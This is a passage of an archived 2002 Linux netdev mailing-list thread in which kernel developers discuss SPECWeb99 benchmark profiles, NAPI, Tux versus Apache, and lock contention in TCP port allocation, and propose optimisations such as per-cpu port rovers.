netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > Actually, oprofile separated out the acenic module from the rest of the > kernel. I should have included that breakout as well. but it was only 1.3 > of CPU: > 1.3801 0.0000 /lib/modules/2.4.18+O1/kernel/drivers/net/acenic.o > > We thought you were using e1000 in these tests? e1000 on the server, those profiles were client side. M. 
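
For a rough sense of where the client-side samples in the profile quoted in this thread go, the rows can be tallied by call path. This is only a sketch: the rows are copied from the quoted oprofile output, but the grouping into "bind path", "user copies" and "fd refcounting" is an assumption made for illustration, not something oprofile reports.

```python
# Rows copied verbatim from the client-side profile quoted in this thread:
# address, sample count, percent of all samples, symbol.
PROFILE = """\
c0106e59 42693 1.89176 restore_all
c01dfe68 42787 1.89592 sys_socketcall
c01df39c 54185 2.40097 sys_bind
c01de698 62740 2.78005 sockfd_lookup
c01372c8 97886 4.3374 fput
c022c110 125306 5.55239 __generic_copy_to_user
c01373b0 181922 8.06109 fget
c020958c 199054 8.82022 tcp_v4_get_port
c0106e10 199934 8.85921 system_call
c022c158 214014 9.48311 __generic_copy_from_user
c0216ecc 257768 11.4219 inet_bind
"""

# Hypothetical groupings, chosen for illustration only.
BIND_PATH = {"sys_bind", "inet_bind", "tcp_v4_get_port"}
USER_COPY = {"__generic_copy_to_user", "__generic_copy_from_user"}
FD_REFS = {"fget", "fput", "sockfd_lookup"}


def parse_profile(text):
    """Return (symbol, samples, percent) tuples for each well-formed row."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip blank or malformed lines
        _addr, samples, percent, symbol = fields
        rows.append((symbol, int(samples), float(percent)))
    return rows


def share(rows, symbols):
    """Sum the percent column over the rows whose symbol is in `symbols`."""
    return sum(percent for symbol, _samples, percent in rows if symbol in symbols)


rows = parse_profile(PROFILE)
for label, group in (("bind path", BIND_PATH),
                     ("user copies", USER_COPY),
                     ("fd refcounting", FD_REFS)):
    print(f"{label:15s} {share(rows, group):6.2f}% of samples")
```

On these rows the bind-related symbols alone come to roughly 22.6% of samples, against the 1.38% reported separately for the acenic module.
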
From ak@suse.de Fri Sep 6 11:43:28 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:43:30 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IhHtG009426 for ; Fri, 6 Sep 2002 11:43:17 -0700 Received: from Hermes.suse.de (Charybdis.suse.de [213.95.15.201]) by Cantor.suse.de (Postfix) with ESMTP id 39ACF14A07; Fri, 6 Sep 2002 20:26:49 +0200 (MEST) Date: Fri, 6 Sep 2002 20:26:46 +0200 From: Andi Kleen To: Dave Hansen Cc: "Martin J. Bligh" , "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <20020906202646.A2185@wotan.suse.de> References: <3D78C9BD.5080905@us.ibm.com> <53430559.1031304588@[10.10.2.3]> <3D78E7A5.7050306@us.ibm.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D78E7A5.7050306@us.ibm.com> User-Agent: Mutt/1.3.22.1i X-archive-position: 114 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev

> c0106e59 42693 1.89176 restore_all
> c01dfe68 42787 1.89592 sys_socketcall
> c01df39c 54185 2.40097 sys_bind
> c01de698 62740 2.78005 sockfd_lookup
> c01372c8 97886 4.3374 fput
> c022c110 125306 5.55239 __generic_copy_to_user
> c01373b0 181922 8.06109 fget
> c020958c 199054 8.82022 tcp_v4_get_port
> c0106e10 199934 8.85921 system_call
> c022c158 214014 9.48311 __generic_copy_from_user
> c0216ecc 257768 11.4219 inet_bind

The profile looks bogus. The NIC driver is nowhere in sight. Normally its mmap IO for interrupts and device registers should show. I would double check it (e.g. with normal profile).

In case it is not bogus: most of these are either atomic_inc/dec of reference counters or some form of lock.
The system_call could be the int 0x80 (using the SYSENTER patches would help), which also does atomic operations implicitly. restore_all is IRET, which could likely also be sped up by using SYSEXIT. If NAPI hurts here then it is surely not because of eating CPU time. -Andi From davem@redhat.com Fri Sep 6 11:46:48 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:46:50 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IkmtG009820 for ; Fri, 6 Sep 2002 11:46:48 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id LAA14873; Fri, 6 Sep 2002 11:43:36 -0700 Date: Fri, 06 Sep 2002 11:43:36 -0700 (PDT) Message-Id: <20020906.114336.132077566.davem@redhat.com> To: Martin.Bligh@us.ibm.com Cc: haveblue@us.ibm.com, ak@suse.de, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <61557945.1031312716@[10.10.2.3]> References: <20020906.113652.40767574.davem@redhat.com> <61557945.1031312716@[10.10.2.3]> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 115 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Martin J. Bligh" Date: Fri, 06 Sep 2002 11:45:17 -0700 > Actually, oprofile separated out the acenic module from the rest of the > kernel. I should have included that breakout as well. but it was only 1.3 > of CPU: > 1.3801 0.0000 /lib/modules/2.4.18+O1/kernel/drivers/net/acenic.o > > We thought you were using e1000 in these tests? e1000 on the server, those profiles were client side. Ok.
BTW acenic is packet rate limited by the speed of the MIPS cpus on the card. It might be instructive to disable HW checksumming in the acenic driver and see what this does to your results. From Martin.Bligh@us.ibm.com Fri Sep 6 11:48:54 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:48:55 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86ImrtG010180 for ; Fri, 6 Sep 2002 11:48:53 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86IqrEG207674; Fri, 6 Sep 2002 14:52:54 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86IqmWq222448; Fri, 6 Sep 2002 12:52:49 -0600 Date: Fri, 06 Sep 2002 11:51:29 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: "David S. Miller" cc: gh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <61930391.1031313088@[10.10.2.3]> In-Reply-To: <20020906.113611.102227888.davem@redhat.com> References: <20020906.113611.102227888.davem@redhat.com> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 116 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > The fact that we're doing something different from everyone else > and turning up a different set of kernel issues is a good thing, > to my mind. You're right, we could use Tux if we wanted to ... but > that doesn't stop Apache being interesting ;-) > > Tux does not obviate Apache from the equation.
> See my other emails. That's not the point ... we're getting sidetracked here. The point is: "is this a realistic-ish stick to beat the kernel with and expect it to behave" ... I feel the answer is yes. The secondary point is "what are customers doing in the field?" (not what *should* they be doing ;-)). Moreover, I think the Apache + Tux combination has been fairly well beaten on already by other people in the past, though I'm sure it could be done again. I see no reason why turning on NAPI should make the Apache setup we have perform worse ... quite the opposite. Yes, we could use Tux, yes we'd get better results. But that's not the point ;-) M. From davem@redhat.com Fri Sep 6 11:51:29 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:51:31 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IpTtG010547 for ; Fri, 6 Sep 2002 11:51:29 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id LAA14915; Fri, 6 Sep 2002 11:48:16 -0700 Date: Fri, 06 Sep 2002 11:48:15 -0700 (PDT) Message-Id: <20020906.114815.127906065.davem@redhat.com> To: Martin.Bligh@us.ibm.com Cc: gh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <61930391.1031313088@[10.10.2.3]> References: <20020906.113611.102227888.davem@redhat.com> <61930391.1031313088@[10.10.2.3]> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 117 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Martin J. 
Bligh" Date: Fri, 06 Sep 2002 11:51:29 -0700 I see no reason why turning on NAPI should make the Apache setup we have perform worse ... quite the opposite. Yes, we could use Tux, yes we'd get better results. But that's not the point ;-) Of course. I just don't want propaganda being spread that using Tux means you lose any sort of web server functionality whatsoever. From gerrit@us.ibm.com Fri Sep 6 11:54:12 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:54:14 -0700 (PDT) Received: from e31.co.us.ibm.com (e31.co.us.ibm.com [32.97.110.129]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IsCtG010925 for ; Fri, 6 Sep 2002 11:54:12 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e31.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86IwLlj040552; Fri, 6 Sep 2002 14:58:21 -0400 Received: from w-gerrit2 (dyn9-47-17-91.beaverton.ibm.com [9.47.17.91]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86IwJWq164748; Fri, 6 Sep 2002 12:58:20 -0600 Received: from w-gerrit2 ([127.0.0.1] helo=us.ibm.com ident=gerrit) by w-gerrit2 with esmtp (Exim 3.35 #1 (Debian)) id 17nOIa-0003Xy-00; Fri, 06 Sep 2002 11:57:44 -0700 To: "David S. Miller" cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Reply-To: Gerrit Huizenga From: Gerrit Huizenga Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-reply-to: Your message of Fri, 06 Sep 2002 11:34:48 PDT. <20020906.113448.07697441.davem@redhat.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <13634.1031338659.1@us.ibm.com> Date: Fri, 06 Sep 2002 11:57:39 -0700 Message-Id: X-archive-position: 118 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gh@us.ibm.com Precedence: bulk X-list: netdev In message <20020906.113448.07697441.davem@redhat.com>, > : "David S. 
Miller" writes: > From: Gerrit Huizenga > Date: Fri, 06 Sep 2002 11:19:11 -0700 > > TUX can optimize dynamic content just fine. > > The last I knew was that it could pass it off to another server. Out of curiosity, and primarily for my own edification, what kind of optimization does it do when everything is generated by a java/perl/python/homebrew script and pasted together by something which consults a content manager? In a few of the cases that I know of, there isn't really any static content to cache... And why is this something that Apache couldn't/shouldn't be doing? gerrit From davem@redhat.com Fri Sep 6 12:01:08 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:01:10 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86J18tG011373 for ; Fri, 6 Sep 2002 12:01:08 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id LAA14995; Fri, 6 Sep 2002 11:58:04 -0700 Date: Fri, 06 Sep 2002 11:58:04 -0700 (PDT) Message-Id: <20020906.115804.109349169.davem@redhat.com> To: gh@us.ibm.com Cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S.
Miller" In-Reply-To: References: <20020906.113448.07697441.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 119 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Gerrit Huizenga Date: Fri, 06 Sep 2002 11:57:39 -0700 Out of curiosity, and primarily for my own edification, what kind of optimization does it do when everything is generated by a java/perl/python/homebrew script and pasted together by something which consults a content manager. In a few of the cases that I know of, there isn't really any static content to cache... And why is this something that Apache couldn't/shouldn't be doing? The kernel execs the CGI process from the TUX server and pipes the output directly into a networking socket. Because it is cheaper to create a fresh user thread from within the kernel (i.e. we don't have to fork() apache and thus dup its address space), it is faster. From gerrit@us.ibm.com Fri Sep 6 12:01:56 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:01:58 -0700 (PDT) Received: from e21.nc.us.ibm.com (e21.nc.us.ibm.com [32.97.136.227]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86J1utG011726 for ; Fri, 6 Sep 2002 12:01:56 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e21.nc.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86J67Df089990; Fri, 6 Sep 2002 15:06:07 -0400 Received: from w-gerrit2 (dyn9-47-17-91.beaverton.ibm.com [9.47.17.91]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86J66Wq092818; Fri, 6 Sep 2002 13:06:07 -0600 Received: from w-gerrit2 ([127.0.0.1] helo=us.ibm.com ident=gerrit) by w-gerrit2 with esmtp (Exim 3.35 #1 (Debian)) id 17nOQ8-0003a8-00; Fri, 06 Sep 2002 12:05:32 -0700 To: "David S.
Miller" cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Reply-To: Gerrit Huizenga From: Gerrit Huizenga Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-reply-to: Your message of Fri, 06 Sep 2002 11:48:15 PDT. <20020906.114815.127906065.davem@redhat.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <13768.1031339127.1@us.ibm.com> Date: Fri, 06 Sep 2002 12:05:27 -0700 Message-Id: X-archive-position: 120 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gh@us.ibm.com Precedence: bulk X-list: netdev In message <20020906.114815.127906065.davem@redhat.com>, > : "David S. Miller" writes: > From: "Martin J. Bligh" > Date: Fri, 06 Sep 2002 11:51:29 -0700 > > I see no reason why turning on NAPI should make the Apache setup > we have perform worse ... quite the opposite. Yes, we could use > Tux, yes we'd get better results. But that's not the point ;-) > > Of course. > > I just don't want propaganda being spread that using Tux means you > lose any sort of web server functionality whatsoever. Ah sorry - I never meant to imply that Tux was detrimental, other than one case where it seemed to have no benefit and the performance numbers while tuning for TPC-W *seemed* worse but were never analyzed completely. That was the actual event that I meant when I said: We also had some bad starts with using Tux in terms of performance and scalability on 4-CPU and 8-CPU machines, especially when combining with things like squid or other cacheing products from various third parties. Those results were never quantified but for various reasons we had a team that decided to take Tux out of the picture. I think the problem was more likely lack of knowledge and lack of time to do analysis on the particular problems. Another combination of solutions was used. 
So, any comments I made which might have implied that Tux/Tux2 made things worse have no substantiated data to prove that and it is quite possible that there is no such problem. Also, this was run nearly a year ago and the state of Tux/Tux2 might have been a bit different at the time. gerrit From davem@redhat.com Fri Sep 6 12:04:08 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:04:10 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86J48tG012092 for ; Fri, 6 Sep 2002 12:04:08 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id MAA15049; Fri, 6 Sep 2002 12:01:04 -0700 Date: Fri, 06 Sep 2002 12:01:04 -0700 (PDT) Message-Id: <20020906.120104.125944656.davem@redhat.com> To: gh@us.ibm.com Cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: <20020906.114815.127906065.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 121 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Gerrit Huizenga Date: Fri, 06 Sep 2002 12:05:27 -0700 So, any comments I made which might have implied that Tux/Tux2 made things worse have no substantiated data to prove that and it is quite possible that there is no such problem. Also, this was run nearly a year ago and the state of Tux/Tux2 might have been a bit different at the time. Thanks for clearing things up. 
From niv@us.ibm.com Fri Sep 6 12:15:12 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:15:16 -0700 (PDT) Received: from e31.co.us.ibm.com (e31.co.us.ibm.com [32.97.110.129]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JFCtG012588 for ; Fri, 6 Sep 2002 12:15:12 -0700 Received: from westrelay03.boulder.ibm.com (westrelay03.boulder.ibm.com [9.17.194.24]) by e31.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86JJOlj035192; Fri, 6 Sep 2002 15:19:24 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by westrelay03.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86JJM19126494; Fri, 6 Sep 2002 13:19:23 -0600 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 154273FE07; Fri, 6 Sep 2002 15:19:15 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id 8AE7B23C00D; Fri, 6 Sep 2002 15:19:14 -0400 (EDT) Received: from 9.47.18.15 ( [9.47.18.15]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Fri, 6 Sep 2002 12:19:14 -0700 Message-ID: <1031339954.3d78ffb257d22@imap.linux.ibm.com> Date: Fri, 6 Sep 2002 12:19:14 -0700 From: Nivedita Singhvi To: Andi Kleen Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <3D78C9BD.5080905@us.ibm.com> <53430559.1031304588@[10.10.2.3]> <3D78E7A5.7050306@us.ibm.com> <20020906202646.A2185@wotan.suse.de> In-Reply-To: <20020906202646.A2185@wotan.suse.de> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.47.18.15 X-archive-position: 122 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev

Quoting Andi Kleen :

> > c0106e59  42693   1.89176  restore_all
> > c01dfe68  42787   1.89592  sys_socketcall
> > c01df39c  54185   2.40097  sys_bind
> > c01de698  62740   2.78005  sockfd_lookup
> > c01372c8  97886   4.3374   fput
> > c022c110  125306  5.55239  __generic_copy_to_user
> > c01373b0  181922  8.06109  fget
> > c020958c  199054  8.82022  tcp_v4_get_port
> > c0106e10  199934  8.85921  system_call
> > c022c158  214014  9.48311  __generic_copy_from_user
> > c0216ecc  257768  11.4219  inet_bind
>
> The profile looks bogus. The NIC driver is nowhere in sight.
> Normally its mmap IO for interrupts and device registers
> should show. I would double check it (e.g. with normal profile)

Separately compiled acenic.. I'm surprised by this profile a bit too - on the client side, since the requests are small, and the client is receiving all those files, I would have thought that __generic_copy_to_user would have been way higher than *from_user.

inet_bind() and tcp_v4_get_port() are up there because we have to grab the socket lock, the tcp_portalloc_lock, then the head chain lock and traverse the hash table which now has many hundred entries. Also, because of the varied length of the connections, the clients get freed not in the same order they are allocated a port, hence the fragmentation of the port space.. There is some cacheline thrashing hurting the NUMA more than other systems here too..

If you just wanted to speed things up, you could get the clients to specify ports instead of letting the kernel cycle through for a free port..:)

thanks, Nivedita

> In case it is not bogus:
> Most of these are either atomic_inc/dec of reference counters or
> some form of lock. The system_call could be the int 0x80 (using the
> SYSENTER patches would help), which also does atomic operations
> implicitly. restore_all is IRET, could also likely be sped up by
> using SYSEXIT.
>
> If NAPI hurts here then it is surely not because of eating CPU time.
>
> -Andi
>
>

From ak@suse.de Fri Sep 6 12:22:13 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:22:15 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JMDtG012982 for ; Fri, 6 Sep 2002 12:22:13 -0700 Received: from Hermes.suse.de (Charybdis.suse.de [213.95.15.201]) by Cantor.suse.de (Postfix) with ESMTP id 3D437149F2; Fri, 6 Sep 2002 21:26:20 +0200 (MEST) Date: Fri, 6 Sep 2002 21:26:19 +0200 From: Andi Kleen To: Nivedita Singhvi Cc: Andi Kleen , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <20020906212619.A28172@wotan.suse.de> References: <3D78C9BD.5080905@us.ibm.com> <53430559.1031304588@[10.10.2.3]> <3D78E7A5.7050306@us.ibm.com> <20020906202646.A2185@wotan.suse.de> <1031339954.3d78ffb257d22@imap.linux.ibm.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1031339954.3d78ffb257d22@imap.linux.ibm.com> User-Agent: Mutt/1.3.22.1i X-archive-position: 123 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev

> If you just wanted to speed things up, you could get the
> clients to specify ports instead of letting the kernel
> cycle through for a free port..:)

Better would probably be to change the kernel to keep a limited list of free ports in a free list. Then grabbing a free port would be an O(1) operation. I'm not entirely sure it is worth it in this case. The locks are probably the majority of the cost.
-Andi From davem@redhat.com Fri Sep 6 12:24:21 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:24:23 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JOKtG013337 for ; Fri, 6 Sep 2002 12:24:21 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id MAA15187; Fri, 6 Sep 2002 12:21:18 -0700 Date: Fri, 06 Sep 2002 12:21:18 -0700 (PDT) Message-Id: <20020906.122118.52140394.davem@redhat.com> To: niv@us.ibm.com Cc: ak@suse.de, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <1031339954.3d78ffb257d22@imap.linux.ibm.com> References: <3D78E7A5.7050306@us.ibm.com> <20020906202646.A2185@wotan.suse.de> <1031339954.3d78ffb257d22@imap.linux.ibm.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 124 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Nivedita Singhvi Date: Fri, 6 Sep 2002 12:19:14 -0700 inet_bind() and tcp_v4_get_port() are up there because we have to grab the socket lock, the tcp_portalloc_lock, then the head chain lock and traverse the hash table which now has many hundred entries. Also, because of the varied length of the connections, the clients get freed not in the same order they are allocated a port, hence the fragmentation of the port space.. There is some cacheline thrashing hurting the NUMA more than other systems here too.. There are methods to eliminate the centrality of the port allocation locking. Basically, kill tcp_portalloc_lock and make the port rover be per-cpu. The only tricky case is the "out of ports" situation.
Because there is no centralized locking being used to serialize port allocation, it is difficult to be sure that the port space is truly exhausted. Another idea, which doesn't eliminate the tcp_portalloc_lock but has other good SMP properties, is to apply a "cpu salt" to the port rover value. For example, shift the local cpu number into the upper parts of a 'u16', then 'xor' that with tcp_port_rover. Alexey and I have discussed this several times but never became bored enough to experiment :-) From davem@redhat.com Fri Sep 6 12:28:09 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:28:11 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JS9tG013720 for ; Fri, 6 Sep 2002 12:28:09 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id MAA15215; Fri, 6 Sep 2002 12:24:05 -0700 Date: Fri, 06 Sep 2002 12:24:05 -0700 (PDT) Message-Id: <20020906.122405.122283378.davem@redhat.com> To: ak@suse.de Cc: niv@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <20020906212619.A28172@wotan.suse.de> References: <20020906202646.A2185@wotan.suse.de> <1031339954.3d78ffb257d22@imap.linux.ibm.com> <20020906212619.A28172@wotan.suse.de> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 125 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Andi Kleen Date: Fri, 6 Sep 2002 21:26:19 +0200 I'm not entirely sure it is worth it in this case. The locks are probably the majority of the cost. 
You can more localize the lock accesses (since we use per-chain locks) by applying a cpu salt to the port numbers you allocate. See my other email. From manfred@colorfullife.com Fri Sep 6 12:35:48 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 12:35:50 -0700 (PDT) Received: from dbl.q-ag.de (IDENT:root@dbl.q-ag.de [80.146.160.66]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86JZktG014132 for ; Fri, 6 Sep 2002 12:35:47 -0700 Received: from colorfullife.com (IDENT:root@localhost.localdomain [127.0.0.1]) by dbl.q-ag.de (8.11.6/8.11.6) with ESMTP id g86Jdkl04607; Fri, 6 Sep 2002 21:39:46 +0200 Message-ID: <3D790499.8020501@colorfullife.com> Date: Fri, 06 Sep 2002 21:40:09 +0200 From: Manfred Spraul User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) X-Accept-Language: en, de MIME-Version: 1.0 To: "David S. Miller" CC: haveblue@us.ibm.com, hadi@cyberus.ca, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: 